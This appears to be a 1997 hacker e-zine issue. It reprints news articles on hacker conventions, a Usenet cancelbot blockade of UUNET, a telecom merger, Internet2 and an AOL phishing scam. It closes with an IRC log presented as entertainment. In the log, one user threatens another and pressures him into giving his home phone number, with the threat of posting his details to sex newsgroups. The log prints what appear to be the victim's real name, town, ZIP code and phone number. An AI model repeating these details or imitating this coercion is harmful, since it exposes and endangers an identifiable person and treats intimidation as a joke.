manipulate network technology, says Thieme, hackers are really playing
catch-up with corporations, which conduct complex video conferences as a
matter of routine. "These are not professional meeting-planners," he says.
Whether such get-togethers work with the groups' natural skills, though,
Wessling believes they are worth the effort: "This is very important, because
it is one of the rare opportunities for these people to really get together."
For participant Alfred Heitink, who's using his trip to HIP partly as an
opportunity to establish an online adoptee network, "It is strange to talk at
a camping site with people at 7 o'clock about PGP.... That's what makes this
place so special."
©1993-97 Wired Ventures, Inc.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
`Spam' foes tie up Usenet
Tuesday, August 5, 1997
BY DAVID L. WILSON
In the old West, Committees of Vigilance arose when there was no legitimate
legal authority, enforcing local mores, sometimes with the aid of a noose.
Now, electronic vigilantes have leaped into action on the modern-day
frontier, the Internet, squelching the ability of hundreds of thousands of
people to get their word out on global bulletin boards.
Since Friday evening, a group of computer system administrators has been
striking back against "spammers" by blocking Usenet messages sent from a
major Internet service provider. As a result, the vast majority of people who
rely on UUNET Technologies Inc., one of the largest Internet service
providers, have been unable since Friday to post messages to Usenet, a kind
of electronic bulletin board accessible through the Internet. Tens of
thousands of messages have been blocked by the protest, which continued
Monday night.
Usenet is made up of thousands of "newsgroups," each dedicated to a specific
topic, from Star Trek to mystery novels to the music of Beethoven. Accepted
practice is that any message posted to a newsgroup must be germane to the
group. Some people ignore the unwritten etiquette of Usenet, however, and
post the same message -- usually an advertisement -- in as many newsgroups as
they can, a process called "spamming." It was not known how many of the
blocked messages were such ads.
In recent years, vigilantes have sprung up who cancel such spams on an
individual basis. This latest incident is unusual, however, because it is
aimed not at the messages themselves, but at the Internet provider that gives
the spammers access to Usenet. The action, believed to be by far the most
far-reaching of its kind in the Internet's history, does not affect the
ability of UUNET subscribers to send and receive individual e-mail messages
or use the World Wide Web.
Non-spam blocked, too
Even so, the scope and indiscriminate nature of the blockage rattled the
Internet community. "I'm very much in sympathy because spam really has
become an enormous problem, but not all the messages they're blocking are
spam," said Mike Godwin, legal counsel for the Electronic Freedom
Foundation in San Francisco, which lobbies for free speech on the Net.
"This is like dropping a nuclear bomb on a town because you know there's a
terrorist living there."
A communique, apparently from the unnamed systems administrators' group
behind the blockade, was posted on Usenet. It says several people are
involved in the action against UUNET, and that the action was taken because
in recent weeks one-third to one-half of Usenet spam has originated with
UUNET. The communique says the huge volume of spam threatens to destroy the
network, and that the action was taken only because the company has ignored
repeated requests from administrators around the world to do something about
the spam problem. System administrators are persons who oversee computers
that route messages on the Usenet system.
Officials with UUNET, based in Fairfax, Va., said they would not comment
until today, however the company's chief executive, John Sidgemore, told the
Washington Post, "These people are not government agents or the police. They
have absolutely no right to cancel service on someone else's infrastructure."
An employee of the company who agreed to comment on condition of anonymity,
said, "I can assure you that this company will use every legal means at its
disposal to deal with it."
UUNET provides Internet access to about 50,000 subscribers, but not
individual users, only other Internet service providers. The number of people
dependent upon UUNET is unknown but could be in the millions.
Individual users would bump into the blockade if their local Internet service
provider purchases Usenet access through UUNET. Users may not even know that
their postings are being blocked.
Vowing to continue
The individuals who helped develop the blockade say they had no choice. "We
are convinced this action was necessary to save the Net," said Dennis
McClain-Furmanski, a student at Radford University in Radford, Va., who is
acting as a spokesman for the group, which numbers about 20. The group has
vowed to continue the action until UUNET takes some kind of action to
minimize the spam it sends out into Usenet.
While spams have existed almost as long as Usenet, their numbers have
increased vastly in the last year. And spammers have become sneakier, forging
fake return addresses, and even forging permission to appear in a "moderated"
news group, where theoretically only messages approved by a human moderator
appear.
The vigilantes who are deleting the Usenet contributions are using -- or
misusing -- a "cancel" feature built into the underlying software on which
Usenet is based. Theoretically, only the person who posted an article on
Usenet can issue a cancel command for it.
Once issued, a cancel message races through the computers connected to the
system around the world, erasing the article. Cancel messages are
legitimately used by authors who have made a mistake or wish to withdraw an
article for some other reason.
Because there are no widespread authentication schemes in use on the
Internet, it is fairly easy to forge a sender's address, however. And there
are computer programs known as "cancelbots" that can be ordered to forge
cancel messages against a spam and erase it throughout Usenet. The vigilantes
use such cancelbots to eliminate spam whenever they spot it.
Local system administrators can thwart such tactics by disabling the cancel
feature on their systems. Therefore, the vigilantes argue, their cancel
messages are mere "advisories."
There have long been people who forge cancel messages, and even some
legendary ``cancel wars'' between people who have attempted to shut each
other up. But never before have so many users been cut off.
"In military terms, this is acceptable collateral damage," said
McClain-Furmanski. The amount of Usenet spam coming out of UUNET connections
was so vast that it could no longer be dealt with by programming the
cancelbots to eliminate individual messages, he said, so they were programmed
to eliminate anything that came out of UUNET.
Sean Eric Fagan of San Jose has owned a Usenet site for more than eight
years. He is not directly participating in the blockade, but is supporting
the participants. "I moderate the newsgroup comp.std.unix, which gets almost
nothing but spam these days," he said.
Fagan says everyone involved in the situation understands the danger that the
power being wielded could be misused. "There's a hazard any time you've got
somebody trying to enforce standards," he said, "but these people are not
vigilantes."
Others disagree, however. Godwin said, "Unless they've been deputized, then
this is vigilante action."
©1997 San Jose Mercury News
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Netly News - HOPE On A Rope
Nothing makes hackers happier than breaking into a computer that another
hacker set up, especially when an appreciative audience is watching. Small
surprise, then, that there were plenty of grins at last weekend's Beyond
HOPE hacker convention in New York City.
The first break-in attempt came at about 4 a.m. on Friday when a huge,
tattoo-encrusted Englishman named Cyberjunkie ran a utility that probed the
network of HOPE's Dutch sister conference, Hacking In Progress. The plan: to
expose any weaknesses, then peel away the security measures of the target
computer like the layers of an onion. The program quickly found several
obvious security holes. "So I had to do something," Cyberjunkie says. "It's a
bit like waving a red flag at a bull, isn't it?" Like the encierro at
Pamplona, Cyberjunkie sent a stampede of null information into one of the
server's memory buffers until it choked and overloaded. Quietly attached at
the end was a simple script that granted him the access he wanted. (In hacker
argot, this is known as an IMAP exploit.)
Because hacking is not only encouraged but rewarded at HOPE -- which
conference organizer Emmannuel Goldstein revived this summer after a
three-year hiatus -- each of the thousands of participants received an IP
address with which they could glom onto the Puck Building's 10-megabit
network and connect to the rest of the world. The Pittsburgh-based DataHaven
Project provided 15 public terminals, but Ethernet hub plugins were
plentiful. Confused? No problem. The 13-year-old with braces in the next
chair was glad to help out. After all, he'd already hooked his ancient DEC,
Hewlett-Packard or portable IBM onto the Net and was busily trying to gain
root access.
When you'd tired of chatting on IRC #hope (topic at 4:11 p.m. on Saturday:
"HOPE is a commercial enterprise full of bull"), you could browse through the
various kinds of phone equipment, T-shirts or software that were on sale.
Ether Bunny sold $250 worth of lineman's equipment (including several
Southwestern Bell hard hats) in just over an hour. There was, of course, a
constant stream of panels to attend: Tiger Teaming (better known as security
consulting); cryptography; how to hack Windows NT; Metrocard hacking; a
prisoner panel that included Bernie S. and Phiber Optik; and an amazing talk
on privacy given by investigator Steve Rambam.
Best known for tracking down 161 Nazi war criminals hiding in Canada, Rambam
is a consummate connoisseur of databases. "It is true that I can go online
and reliably determine if you are a homosexual or a lesbian. It is true that
I can go online and determine your religion. I can go online and, without
breaking a sweat or getting carpal tunnel syndrome, find what movies you rent
at Blockbuster," he said.
Yet Rambam takes an unlikely stance on the privacy issue, especially in a
room full of paranoids. Closing off databases, he says, will not adversely
affect his work -- since he'll always be able to buy the information from
someplace. "It will harm the ability of the average person to control their
lives; to check up on government to see if they are lying to him, to check up
on big business to see if they are lying to him, to check up on the guy next
door and see if he is an ax murderer," he said.
Now Rambam may be biased, for he operates a billion-record database that is
accessible online to subscribers (he refused to give the URL for fear of
hacking attacks). Nevertheless, it was rare to see so many teenagers taking
copious notes, noted fellow attendee Shabbir Safdar. The audience couldn't
get enough of Rambam, who looked more like a fed than a hacker in his
custom-made Hong Kong suit. (A big hit was when he detailed how to turn a
dead man's identity into your own.) But ultimately, Rambam questioned why
anyone would want to: "The fact of the matter is that there is no real reason
to hide most of who you are and what you do."
It's an unfortunate but true statement about the state of hacking today.
Where have all the good hacks gone? Three years later and the flimsy
Metrocard is still impenetrable. A panel of hackers turned security
consultants showed that one of the biggest challenges for today's data
cowboys was changing the preconceived notions of hackers held by the
corporations they work for.
Keynote speaker Brock Meeks, went so far as to admonish the crowd for their
low hacker batting average (only 20 percent of all government computer
systems have been hacked). His address was putatively a history of hacking in
America, but it sounded more like a call to arms for the audience. "You're
going to have to learn how to hack the media, because you haven't been doing
a good job of it," Meeks said.
Indeed, hackers get their share of bad press, and they gripe about it to no
end. And HOPE highlighted the split personality hackers bring to their
relationship with the media. Like most groups, they lambaste journalists. Yet
their keynote speaker wasn't an agent provocateur, but a member of the press
(albeit an esteemed one who champions the hacker cause). There was a panel
discussion (which I participated in) where hackers could finally turn the
tables on the media in attendance. "No weapons allowed," said the schedule of
events. Yet only one of the audience's questions criticized the press,
specifically noting John Markoff and his book on Kevin Mitnick. There was
even a "Media Portrayal of Hackers" survey being distributed by a University
of Tennessee sociology student as part of his master's thesis.
Perhaps it's useless to analyze hacker-vs.-media steretypes. After all, the
hacker community has shown that it can successfully run its own magazines,
pirate radio stations and web sites. If it's true that information technology
is going to obliterate old media, the horsemen of the apocalypse are more
likely riding from alt.2600 than from Wired. "The whole 2600 thing is a media
hack," admitted Goldstein. And the success of this year's HOPE showed not
only that Goldstein knows how to co-opt the media but that he might be a damn
good entrepreneur as well.
©1997 CNN
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Bell Atlantic-Nynex Merger Gets Final OK
(08/14/97)
By Kora McNaughton, TechInvestor
WASHINGTON -- The Federal Communications Commission Thursday approved the
merger of Nynex and Bell Atlantic, creating the second-largest phone company
in the United States.
Although the FCC's blessing was not altogether unexpected, Wall Street
welcomed the news, pushing both companies' stock up after the late afternoon
announcement. Bell Atlantic [BEL] gained 1 1/4 to close at 75 15/16; Nynex
[NYN] closed up 1 1/8 at 58 1/16.
Last month, after the two companies proposed conditions designed to promote
competition in their markets, the agency's chairman, Reed Hundt said he was
ready to approve the deal. Hundt stumped for a new telecommunications law on
Thursday.
In a joint announcement, Nynex and Bell Atlantic said they are "pleased" that
the agency unanimously agreed to the merger, which will close "as soon as
possible."
The $23 billion merger, first announced in April of 1996, will create a phone
company with a presence in markets covering most of the Eastern seaboard,
serving 40 million phone access lines and 5.5 million wireless customers. It
will be headquartered in New York.
Since the merger was announced, Bell Atlantic and Nynex have been dancing
with regulators on both the Federal and local levels.
Commissioner Rachelle B. Chong said in a statement Thursday the FCC approved
the deal "only after a very careful analysis of the likely market effects of
the merger, and the imposition of certain enforceable pro-competitive
conditions to help ensure that the local network is opened -- and stays
opened -- to new competitors."
The conditions include providing detailed performance reports to competitors
and regulators, offering interconnection, network element, transport, and
termination at rates based on forward-looking economic costs, and offering
shared transport priced by the minute and routed just as Bell Atlantic's own
traffic, without access charges.
Bell Atlantic and Nynex proposed the conditions July 19, one day after the
Eighth U.S. Circuit Court in St. Louis ruled that the FCC had exceeded its
authority by trying to set the prices new entrants will pay for access to
local phone networks. The Baby Bells built the networks, but now must share
them with competitors.
Long-distance companies such as AT&T and MCI have accused the RBOCs of
delaying required upgrades to the local networks to allow for competition;
earlier this week, MCI complained Nynex was taking too long to process orders
for MCI local service in New York, thereby slowing MCI's growth in that
region.
In a statement after the ruling Thursday, MCI Chief Policy Counsel Jonathan
Sallet praised the FCC. "The conditions that have been announced today and
that will be enforced by the FCC will help to alleviate the anticompetitive
impact of the Bell Atlantic-Nynex merger," he said.
©CMP Media, 1996.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Getting Ready For Internet2
(08/18/97)
By Larry Lange, Electronics Engineering Times
ANN ARBOR, Mich. -- The effort to build Internet2--an academic and
government research-only network separate from the increasingly
commercialized Internet--is kicking into high gear following a series of
technical meetings this summer.
The effort is rapidly picking up participants from universities that want to
log on to the proposed high-speed, multimedia-oriented network. And
communications OEMs are eyeing Internet2 as an ideal test bed for their
next-generation systems.
Having completed a critical technical workshop here early this month and one
in July in Denver, the Internet2 organization is pushing to meet its
self-imposed deadlines for bringing its network live by year's end, with
three university members to be connected as early as this month.
The network promises benefits for commercial as well as academic Internet
users. Obviously, offloading institutional traffic from the commercial
Internet will speed transmissions for both Internet and Internet2 users.
But the "I2" will also "speed the development of new network features and
functionality," said Charles Lee, senior manager of Internet2 interests for
MCI Communications Inc. Those features and functions "could then be
incorporated into the commercial Internet," Lee said.
The work is coming at a time when the underlying base technology of the
Internet Protocol is being pulled in many directions. In this environment,
communications OEMs are eager for a safe haven to test out future
technologies.
"Internet2 will provide a large-scale environment to try out new ideas and
equipment running at speeds faster than any in operation with an intellectual
community of users," said Stephen Wolff, director of business development for
Cisco Systems Inc., a participant in the project.
The Internet2 organization has grown from 34 members at its October inception
to more than 100 research universities today. Notable government
representatives hail from the U.S. Department of Energy and the National
Science Foundation (NSF, Arlington, Va.). Several members are already
engineering prototype network facilities, with the project's initial
operations expected to begin by year's end.
"We originally thought only 20 to 30 of the major research universities had
such a high priority for continuing to build their network infrastructure
that they would join the project," said Internet2 director Mike Roberts of
Educom, a consortium of universities that promotes the use of information
technology in education and research. "Obviously, we were wrong."
So far, Internet2 university members have committed up to $50 million per
year in new funding for the project, and the commercial sector--with project
representation from such companies as Cisco, Lucent Technologies, Sun
Microsystems, IBM, AT&T and Microsoft--has pledged more than $5 million. By
contributing funding to university partners, the corporations can tap the
project as a testbed for unproven Internet technologies--a task that's
difficult to undertake on today's overcrowded Internet.
Internet2 organizers are working with representatives from IBM, MCI, Cisco
and other internetworking companies to discuss the needs of the system
architects developing the advanced Internet2 nodes called Gigapops (points of
presence)--the network aggregation points for the second-generation Internet
wide-area network.
Ted Hanss, director of applications development for the Internet2 project,
told EE Times that such applications-enabling technologies as security,
multicast and quality of service were among the important topics discussed at
the summer meetings. The applications heading the list for I2 are
collaborative environments, digital libraries, tele-immersion, tele-medicine
and distance-independent instruction, Hanss said.
Internet2 engineers have officially settled on an architecture of
connectivity through Gigapops, which can swiftly connect the campuses, labs
and, later, the urban-area and state/regional networks envisioned by the
Clinton administration's Next-Generation Internet (NGI) initiative.
Accordingly, Internet2 engineers look to deliver 622-Mbit/second
transmissions to three supercomputer centers, running the Internet Protocol
(IP) over an asynchronous-transfer-mode (ATM) network. And they want to boost
bandwidth by nearly 14 percent for the University of Illinois National Center
for Supercomputer Applications (NCSA), the San Diego Supercomputer Center and
the Pittsburgh Supercomputer Center, with the promise of 20 more universities
to be linked by this fall to Gigapops that will deliver data at speeds of at
least 155 Mbits/s. (Current commercial transmission speeds top out at 45
Mbits/s.)
Other Internet2 project members have laid the foundations for connectivity to
the network based on its anticipated speeds. A group of universities in
California recently announced the building of an Internet2 network that will
be designed to connect campuses at speeds of over 600 Mbits/s.
"The electronic highway is faced with rush-hour traffic most of the day. We
need reliable service delivery," said M. Stuart Lynn, associate vice
president at the University of California and the principal investigator for
the project.
The participating schools include seven campuses of the University of
California, along with the California Institute of Technology, California
State University, Stanford University and the University of Southern
California. Notable goals for the project will be the formation of a virtual
university in which students can view publications from distant libraries and
take classes located at other campuses.
Internet2 is systematically swallowing up the National Science Foundation's
Very High-Performance Backbone Network Service (vBNS). More than 50 Internet2
institutions have received competitively awarded vBNS grants under the NSF's
High Performance Connections program.
In fact, vBNS could be considered the heart of Internet2, or at least its
substantive launchpad. Begun in 1995, with an investment of $50 million under
a five-year cooperative project with MCI, the service links six NSF
supercomputer centers and was initially implemented to design and support
"gigabit testbeds" for R&D of advanced networking technologies. The centers
are located at the Cornell Theory Center, at NCSA and elsewhere.
Those technologies included ATM/Sonet, the interfacing of ATM to the High
Performance Parallel Interface and HiPPI switches, and all-optical
networking. Each testbed addressed an application that required gigabit-speed
networks.
The trunk-line infrastructure for true broadband services to academia is
being defined at a time when the core protocols for the Internet are being
upgraded from the original transport and network protocols developed by the
Advanced Research Projects Agency (now Darpa) in the 1980s.
NSF program director Mark Luker said many of the problems restricting the
commercialization of the original Internet "should be solved within the next
few years using Internet2." Once traditional not-for-profit users move to the
new network, Luker said, "it will be easier to implement pay schemes and give
incentives to finance further Internet growth."
Luker's comments underscore one of the motivations behind the
administration's NGI initiative: relieving the current Internet's bandwidth
bottlenecks.
"This is an ongoing proposition. It won't stop with Internet2. I see an
Internet3 and 4 in the near future," Luker said. By the end of 1998,
Internet2 looks to have nearly all participating universities employing
stable Internet2 connections.
Projects under development with Internet2, Luker said, include digital
multimedia libraries accessible in virtual reality, enhanced collaborative
workplace communities with live digital video feeds, videoconferencing,
collaborative computer-integrated manufacturing, weather forecasting and
military-troop-movement monitoring.
A briefing on Internet2 by the NASA Ames Research Center at Moffett Field
(Mountain View, Calif.) drew more than 60 companies. "Although much of the
research needed to make a new, superfast Internet is too risky and long-term
for the private sector, our success will depend on partnerships with private
industry and universities," Christine Falsetti, NGI project manager at Ames,
said.
NASA recently designated Ames the lead institution for the agency's $30
million portion of a three-year, $300 million federal project to develop the
NGI. "We want a network for researchers that is fast from end to end. And we
will work with private companies on routers, switchers and computer
workstations that will send computer information much faster than today's
machines can send it," Falsetti said.
One NASA goal is to create "co-laboratories" by linking labs, computers,
databases and scientists from around the world via I2. Ames is organizing a
September workshop for companies interested in such emerging applications.
The NGI initiative was unveiled in October with three basic goals: to connect
universities and national labs with high-speed networks that would be 100 to
1,000 times faster than the commercial Internet; to promote experimentation
with advanced multimedia technologies, such as real-time videoconferencing;
and to demonstrate new applications that support scientific research,
national security, distance education, environmental monitoring and health
care.
On the campaign trail, the Clinton administration promised $100 million in
funding for its initiative. The funds are set for release in January.
Internet2 spokesmen are quick to say that the network is not designed to
replace the existing public Internet or to sidestep the NGI initiative. "The
goals of Internet2 and of the NGI are entirely compatible and complementary,"
said Douglas Van Houweling, vice chairman of Internet2. "There is a
compelling unanimity of purpose and direction."
Yet Internet2 is not without its critics. There have been suggestions, for
instance, that universities are leveraging the project to maintain a separate
network presence.
But Internet2 Steering Committee member Raman Khanna disputed that assertion.
"At Stanford, where I work, only 15 percent of Internet traffic goes toward
other universities," Khanna said. "The other 85 percent connects the school
to the rest of the commercial network. Even if academia were to isolate its
future, high-speed network system, it would speed up only 15 percent of its
Internet traffic."
Khanna also noted that the high-speed network is merely for the development
of advanced applications and that any advances made will be available to all
Internet users in three to five years.
Another point of controversy is the government's role in funding specific
university projects though Internet2. Several high-level lawmakers complained
at recent Senate hearings that the NGI program favors urban areas and large
universities.
But Neal Lane, director of the National Science Foundation, said that
Internet2 "is not an established infrastructure like a highway. It is a work
in progress . . . and it is experimental.
"That is the reason we need the nation's researchers to help us move
forward."
It remains to be seen whether the Internet2 body can pull off its monumental
project and then seamlessly bring the network into line with the commercial
Internet and provide bandwidth and multimedia solutions for the NGI, all by
the slated deadline of 2000. If it can, the project will look to realize even
more impressive goals.
Internet2 plans to share discoveries with others in education worldwide.
"This is the approach that characterized the first Internet," said NSF's
Luker, "and it can work again with Internet2."
©CMP Media, 1996.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
AOL urges its members to protect themselves
August 26, 1997
By Franklin Paul
NEW YORK (Reuter) - America Online Inc.'s subscribers can do as much, if not
more than the company can, to protect themselves from online theft and
fraud, a company executive said Tuesday following a recent scam.
The world's largest online service says smart members can do more to keep
their personal information private than could any protective software program
or lurking online police.
"If you want to protect yourself, you need to protect your personal
information," Tatiana Gau, AOL's vice president of integrity assurance, said
in an interview.
"We have a three-pronged approach; to educate, empower and enforce, where we
put the tools in the hands of our members to allow them to protect
themselves," against those who would take personal information to commit
crimes like credit card fraud, she said.
The approach includes frequently reminding the service's more than 8 million
members that AOL staff members will never ask for password or billing
information, and telling them where to go to report a scam in action.
"People are beginning to realize that the same kind of scams that occur in
real life do occur online," Gau said. "So in the same way in real life you
would never dream of giving out your PIN number to your ATM card, you
shoudn't be doing it online either."
Earlier this month, a scam was perpetrated on AOL whereby members received
electronic mail that invited them to jump to a Web page which contained text
of a letter from AOL Chairman Steve Case.
From there, another link asked members to enter billing information. Thinking
they were providing data to AOL, they were really handing their vital
information to thieves.
While Gau would not say how many members were duped by the scam, or if the
perpetrators were caught, she said it was other AOL members that fingered the
crooks.
"It was literally within a matter of hours of the mail being sent out that
the e-mail was forwarded to us, which allowed us to very quickly get the site
shut down," she said.
"The billing scam ... is really testimony to the fact that our ... mechanisms
are working," she said.
She adds that the company's other security measures include adding alerts to
the first screen that members see when they sign on and putting e-mail with
safety tips in the mailboxes of new members.
AOL also urges members not to download files from sources they are unfamiliar
with and it makes available free anti-virus software.
AOL's stock fell $1 to close at $66 on the New York Stock Exchange.
©Reuters Ltd.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Logs - Yaaay! It's IRC!!! ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
discore messing around with that always lame ZeR0-HeX:
Session Start: Mon Aug 18 01:31:53 1997
[1:31] <ZeR0-HeX> you're bullshitting
[1:31] <ZeR0-HeX> you don't know shit
[1:32] <ZeR0-HeX> if you really do know my phone number
[1:32] <ZeR0-HeX> tell it to me
<discore> ok!
Session Close: Mon Aug 18 01:33:16 1997
Session Start: Mon Aug 18 01:33:17 1997
[1:33] <ZeR0-HeX> may i ask where you received this information from?
<discore> my ereet hackmobile.
[1:33] <ZeR0-HeX> come on
[1:33] <ZeR0-HeX> i just wanna know
<discore> sorry tootsies, no can do
[1:33] <ZeR0-HeX> turn ur away message off!!!!!!!11
<discore> hmmm, whats yer phone #, i dont feel like calling the operator
[1:34] <ZeR0-HeX> alright
[1:34] <ZeR0-HeX> well
[1:34] <ZeR0-HeX> i believe ya
<discore> teehee
<discore> elite!
<discore> so
[1:35] <ZeR0-HeX> what do you intend to do with this information? i have done nothing wrong to
you. so please don't do anything bad
<discore> why did ya copy phrack?
[1:35] <ZeR0-HeX> oh
<discore> thats not very nice you know
[1:35] <ZeR0-HeX> so this is what it's about
[1:35] <ZeR0-HeX> ok
[1:35] <ZeR0-HeX> i'll explain
[1:35] <ZeR0-HeX> but
[1:35] <ZeR0-HeX> you gotta promise not give my info out to anyone
[1:35] <ZeR0-HeX> ok?
<discore> teehee
<discore> over 14,000 ppl have it
[1:36] <ZeR0-HeX> who?
<discore> woot
<discore> tell me why
<discore> i want to kn0w
[1:36] <ZeR0-HeX> wait
[1:36] <ZeR0-HeX> i'll tell you
[1:36] <ZeR0-HeX> but 1st
[1:36] <ZeR0-HeX> you gotta tell me where you got the info from
[1:36] <ZeR0-HeX> and you gotta tell me who the 14000 people are
[1:36] <ZeR0-HeX> and how theygot it
<discore> hmm, i dont know all the names of the 14,000 ppl
<discore> but i will check it!
<discore> ill make ya a deal, ok?
[1:37] <ZeR0-HeX> how the hell did 14000 people get it?
<discore> wanna deal?
[1:37] <ZeR0-HeX> sure
<discore> oK!
[1:37] * ZeR0-HeX listening
[1:37] <ZeR0-HeX> ???
<discore> tell me a real phone # of your house, and i will tell you what you want to know, if
the phone # is fake-o then inphoz get posted on alt.sex.*
[1:38] <ZeR0-HeX> why do you want my phone number?
[1:38] <ZeR0-HeX> so you can give it to the 14,000 people
[1:38] <ZeR0-HeX> nice try
<discore> cause im too lazy to call the operator
[1:38] <ZeR0-HeX> then you can bullshit me after
<discore> no actually i keep files on ppl
<discore> heh
<discore> and like, i just want it for personall use
<discore> i wont play with ya
[1:38] <ZeR0-HeX> who the fuck are you??
<discore> dont worry, i could still get it through other ways than you
[1:38] <ZeR0-HeX> why do you have my info???
<discore> im discore!
[1:39] <ZeR0-HeX> oh man..
<discore> thats what our deal is about buddy
<discore> its a fair trade
[1:39] <ZeR0-HeX> jeez, you're something :-)
[1:39] <ZeR0-HeX> what info do i want1!!
[1:39] <ZeR0-HeX> the only thing i want
[1:39] <ZeR0-HeX> is to not let the 14,000 people know
[1:39] <ZeR0-HeX> listen
[1:39] <ZeR0-HeX> if you were really a hacker
[1:40] <ZeR0-HeX> you would have known my number
<discore> well, you are right
<discore> BUT im lazy and bored tonight so you are my project
[1:41] <ZeR0-HeX> ok
[1:41] <ZeR0-HeX> if i give you my phone number
[1:41] <ZeR0-HeX> what would i get back in return
[1:41] <ZeR0-HeX> ABSOLUTELY SHIT
<discore> whatever you want out of me, sex or anything!
[1:41] <ZeR0-HeX> i still can't stop the 14000 people
[1:41] <ZeR0-HeX> lol
[1:41] <ZeR0-HeX> hehe
<discore> so
<discore> wanna do that?
[1:42] <ZeR0-HeX> ok
[1:42] <ZeR0-HeX> but wait
[1:42] <ZeR0-HeX> i'll giva ya my number
<discore> K!
[1:42] <ZeR0-HeX> but
[1:42] <ZeR0-HeX> what are you gonna tell me?
<discore> how the ppl got it, where they got it and why it was made public.
[1:42] <ZeR0-HeX> hmmm
[1:42] <ZeR0-HeX> ok
[1:42] <ZeR0-HeX> but
[1:43] <ZeR0-HeX> wait
[1:43] <ZeR0-HeX> after i give you the numer
[1:43] <ZeR0-HeX> number
[1:43] <ZeR0-HeX> you can't tell anyone it
[1:43] <ZeR0-HeX> ok?
<discore> i know!
[1:43] <ZeR0-HeX> no
[1:43] <ZeR0-HeX> don't bullshit me
<discore> why would i bullshit you?
[1:43] <ZeR0-HeX> this is serious shit
<discore> im getting something.
[1:43] <ZeR0-HeX> ok
[1:43] <ZeR0-HeX> dont tell anyone
[1:43] <ZeR0-HeX> ok
<discore> k..
[1:43] <ZeR0-HeX> fine
[1:43] <ZeR0-HeX> you go 1st
[1:43] <ZeR0-HeX> with the info
<discore> bahahaha
[1:43] <ZeR0-HeX> then i'll go
<discore> nein, cause i have something that is more important to you.
[1:44] <ZeR0-HeX> obviously i'll tell you the number!! i dont want my address and name posted
up everywhere in the internet
[1:44] <ZeR0-HeX> alright
[1:44] <ZeR0-HeX> alright
[1:44] <ZeR0-HeX> 860
[1:44] <ZeR0-HeX> 875
[1:44] <ZeR0-HeX> 2117
<discore> well teehee, i dont trust you, but you shouldnt trust me but im in control.
[1:44] <ZeR0-HeX> there
[1:44] <ZeR0-HeX> gimme a call tomorrow
[1:44] <ZeR0-HeX> :-)
[1:44] <ZeR0-HeX> ok
<discore> lemme look for a sec to verify
[1:44] <ZeR0-HeX> now can i have the info please?
[1:44] <ZeR0-HeX> ok
[1:44] <ZeR0-HeX> wait
[1:44] <ZeR0-HeX> hey
[1:44] <ZeR0-HeX> go to www.yahoo.com
[1:44] <ZeR0-HeX> go to people search
[1:45] <ZeR0-HeX> type in mumtaz alam
[1:45] <ZeR0-HeX> ellington, ct 06029
[1:45] <ZeR0-HeX> there, made it ez fer ya
<discore> extremly
<discore> i used yp.uswest.com
<discore> but thats ok!
<discore> now what you wanna know?
[1:45] <ZeR0-HeX> ok
[1:45] <ZeR0-HeX> the public crap?
[1:46] <ZeR0-HeX> how the 14000 people got it
[1:46] <ZeR0-HeX> etc.
[1:46] <ZeR0-HeX> how you got it
[1:46] <ZeR0-HeX> etc.
<discore> well, there is a land called #phreak
<discore> they owned you recently
[1:46] <ZeR0-HeX> grrrrrr
[1:46] <ZeR0-HeX> and....
<discore> well its not our fault you used your real name in email headers
[1:46] <ZeR0-HeX> what???
<discore> and ppl spread shit.
[1:46] <ZeR0-HeX> which one/?
[1:46] <ZeR0-HeX> not zer0-hex
[1:46] <ZeR0-HeX> what e-mail headers?
<discore> teehee
<discore> in your emails
<discore> it has your real name
<discore> aol does it by defult
<discore> :)
[1:47] <ZeR0-HeX> i use zer0-hex@juno.com
[1:47] <ZeR0-HeX> how did they get faraz outta that
[1:47] <ZeR0-HeX> huh?
<discore> well, heh, thats how we got it!
[1:47] <ZeR0-HeX> what has it?
[1:47] <ZeR0-HeX> where?
[1:47] <ZeR0-HeX> where????
<discore> settle young child of the force
[1:48] <ZeR0-HeX> well?
[1:48] <ZeR0-HeX> sometime today would be nice?
[1:48] <ZeR0-HeX> i'd like to get some sleep
<discore> i dont understand the question.
[1:48] <ZeR0-HeX> what e-mail header?
[1:48] <ZeR0-HeX> what about aol?
[1:48] <ZeR0-HeX> i dont have aol
<discore> well it seems you sent some mail from aol that contained your real name
[1:48] <ZeR0-HeX> huh?
[1:48] <ZeR0-HeX> where?
<discore> and that went public cause no one was hapy with you for copying phrack
[1:48] <ZeR0-HeX> when?
<discore> i dunno
<discore> geeze
<discore> im not god
[1:49] <ZeR0-HeX> i thought you had the answers
[1:49] <ZeR0-HeX> !!!
[1:49] <ZeR0-HeX> ok
[1:49] <ZeR0-HeX> now how did it get public?
[1:49] <ZeR0-HeX> and how did 14000 people get it?
<discore> ppl spread inphoz fastly in the hightech society we live in
<discore> well
<discore> not 1400
<discore> not 14000
<discore> i exaggeratted
